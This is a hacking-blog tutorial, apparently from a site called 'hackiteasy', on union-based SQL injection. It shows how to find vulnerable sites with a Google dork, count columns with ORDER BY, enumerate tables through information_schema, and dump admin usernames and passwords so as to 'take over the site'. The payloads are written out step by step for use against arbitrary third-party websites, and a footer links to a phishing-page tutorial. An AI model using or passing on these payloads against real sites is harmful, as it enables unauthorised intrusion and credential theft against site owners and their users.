Tutorial: sql injection

Sql Injection tutorial advanced. So far in all the hacks the most used by h4ck3rs from n00b to an 1337 one has been the SQL injection attack. Here we at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to be working on a huge no. of sites.

The hack starts as follows.

Finding vulnerable site

To find a vunerable site open google

Type in a dork like “inurl:index.php?id=” (without quotes) there are many other similar formats for finding such vulnerable pages.

Now click on any site like

Now to test if the siote is hackable or not add a ‘ at the end of the site.

If the site gives an error like

“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”84′ at line 1″

we can assume that it is vunerable. If not try some other site.

We have the vulnerable site now. So lets try with different sql injection queries.

Checking the number of columns:

 To check the number of columns we do the following order by 1– if the page loads normally without any error we proceed below order by 2– (no error)
similarly check order by 3– order by 4– order by 5– order by 6– =>error

if we get an error at the 6 like “unknown column” that means there exists only 5 columns.

Finding vunerable columns:

To find the vunerable columns we add union all select 1,2,3,4,5– after

Now the url becomes union all select 1,2,3,4,5–

after hitting enter we if we see some numbers like 2 4 some where on the page.Then the columns 2 and 4 are vunerable and data can be retrieved from colums 2 and 4. This is important as we would see data on these columns only.

Finding Mysql version:

To find the sql version we replace 2 or 4 (or the bulnerable column in yor case) with @@version.

The URL would become- union all select 1,@@version,3,4,5–

After hitting enter the sql version appears on the page in the vulnerable column space

Lets assume we got 5.0.90-community-log on page which is sql version.

Getting Table names:

To get table names replace @@version in the url with table_name and add from information_schema.tables– to the end.

The url now becomes union all select 1,table_name,3,4,5 from information_schema.tables–

After hitting enter the page shows the tablenames.

Lets us assume we got something like this


To take over the site we data should be retrieved from admin table.As it seems the most favorable to contain all the passwords.

Getting the column names:

To get the column names from the table “admin” we do the following union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(ascii of tablename)–

Converting the tablename to ascii:
For the real hack above first we have to convert the admin table to ascii values. Convert the tablename to ascii here…ascii.html

The ascii generated for the table name admin is & #97;&# 100;&# 109;&# 105;&# 110;

Now remove &# and add a , between them

So now it is 97,100,109,105,110

Replace it in the place of ascii of the tablename

Now it becomes union all select 1,column_name,3,4,5 from information_schema.columns where table_name=char(97,100,109,105,110)–

You can now see something like

username pwd gender email on page

Getting username and password:

To get the username and password we use union all select 1,concat(username,0x3a,pwd),3,4,5 from admin–   and hit enter.

At this point we see username and password on page.

The password may be in MD5 encrypted form, this can easilt be decrypted using the following converter-

This was a nice SQL injection hack tutorial. Please comment if you like the post.


Go to our new site-

What do you think?

0 points
Upvote Downvote


Leave a Reply

Leave a Reply

Your email address will not be published. Required fields are marked *





Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.

Fasttrack – an automated penetration tool for linux